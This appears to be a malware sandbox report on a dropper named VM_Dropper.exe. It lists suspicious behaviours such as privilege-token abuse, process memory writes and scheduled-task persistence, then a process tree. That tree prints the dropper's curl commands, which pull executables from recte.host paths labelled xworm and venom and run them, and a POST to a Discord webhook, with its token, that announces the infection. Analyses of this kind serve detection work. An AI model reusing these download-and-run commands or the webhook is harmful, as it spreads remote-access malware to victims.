Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\penisballs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\sachost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisballs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\physics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\sachost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\physics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisballs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\yar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\calc.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: 31 N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\yar.exe
PID 4284 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\yar.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\sachost.exe
PID 4284 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\sachost.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisware.exe
PID 4284 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisware.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisballs.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisballs.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\physics.exe
PID 4284 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\physics.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5040 wrote to memory of 3788 N/A C:\Users\Admin\yar.exe C:\Windows\System32\schtasks.exe
PID 5040 wrote to memory of 3788 N/A C:\Users\Admin\yar.exe C:\Windows\System32\schtasks.exe
PID 2276 wrote to memory of 3052 N/A C:\Users\Admin\penisware.exe C:\Windows\System32\schtasks.exe
PID 2276 wrote to memory of 3052 N/A C:\Users\Admin\penisware.exe C:\Windows\System32\schtasks.exe
PID 4284 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\calc.exe
PID 4284 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\calc.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7fffce9e2e98,0x7fffce9e2ea4,0x7fffce9e2eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3204 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\curl.exe

curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

C:\Users\Admin\yar.exe

"C:\Users\Admin\yar.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe

C:\Users\Admin\sachost.exe

"C:\Users\Admin\sachost.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Users\Admin\penisware.exe

"C:\Users\Admin\penisware.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\penisballs.exe

"C:\Users\Admin\penisballs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe

C:\Users\Admin\physics.exe

"C:\Users\Admin\physics.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe

C:\Windows\SysWOW64\curl.exe

